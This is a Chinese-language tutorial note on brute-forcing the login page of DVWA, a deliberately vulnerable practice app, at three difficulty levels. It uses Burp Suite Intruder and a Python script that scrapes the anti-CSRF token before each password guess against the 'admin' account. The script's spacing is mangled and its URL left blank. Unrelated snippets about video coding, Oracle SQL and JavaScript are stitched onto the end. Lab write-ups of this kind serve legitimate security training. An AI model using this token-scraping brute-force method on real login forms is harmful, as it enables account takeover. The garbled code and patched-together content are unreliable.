1.low 級別
burpsuite抓包
low級別是使用get請求進行登入,將其傳送到intruder中,並增加password變數
之後選擇字典開始攻擊。
暴力破解完成後,檢視結果result,根據content-length來判斷登陸是否成功。
2.medium級別
有效抵制了sql注入,但是並未有對爆破破解做有抵禦措施,因此爆破方法與上述類似,只是這裡增加了乙個sleep(2)會降低爆破的時間。
3.high級別
此時在登入時就加入了令牌機制,該令牌被放置在提交的**中,每次提交登入都會先對token進行校驗。因此每次都需要先把token爬取到只有在進行登入提交,從而實現暴力破解。
這裡就通過爬蟲的方式進行暴力破解,首先抓去token,之後帶token提交引數,得到的response判斷其長度,也是根據長度進行判斷是否登陸成功。
#coding=utf-8frombs4importbeautifulsoup
importrequests
header=
requrl=""dvwa_session = requests.session()
i=0defget_token(requrl,header):
req=dvwa_session.get(url=requrl,headers=header,)
the_page=req.content
response=req.status_code
soup=beautifulsoup(the_page,"lxml")
user_token=soup.form.find_all('input')[3]['value']
returnuser_token,len(the_page)
user_token,l=get_token(requrl,header)
forlineinopen('rkolin.txt'):
requrl=""+"?username=admin&password="+line.strip()+"&login=login&user_token="+user_token
i=i+1
user_token,l=get_token(requrl,header)
printi,'admin',line.strip(),l
SVC筆記之一
本筆記參考advance in scalable video coding 1 在ppt介紹可伸縮編碼原理部分,有一張編碼系統框圖不是很直觀 相對於它上面那幅 需要做一些說明。假設當前幀是fn,則前一幀為fn 1,相應的運動補償分別為rn和rn 1,高精度量化通道為qh,低精度量化通道為ql。於是高...
Oracle筆記之一
1.oracle 複製表 create table tmps as select from emp 2.使用子查詢插入資料 insert into temps select from user objects 3.oracle 中遞迴查詢的使用 select from emp start with ...
js筆記之一
寫給自己看的。為了處理以前由伺服器端語言負責的一些驗證操作。現在具備了與瀏覽器視窗及其內容等幾乎所有方面互動的能力。關於全域性變數 建立變數不加var,那麼它是全域性變數。在區域性作用域中定義全域性變數很難維護,是不好的做法。給未經宣告的變數賦值在嚴格模式下,會丟擲referencerrror錯誤。...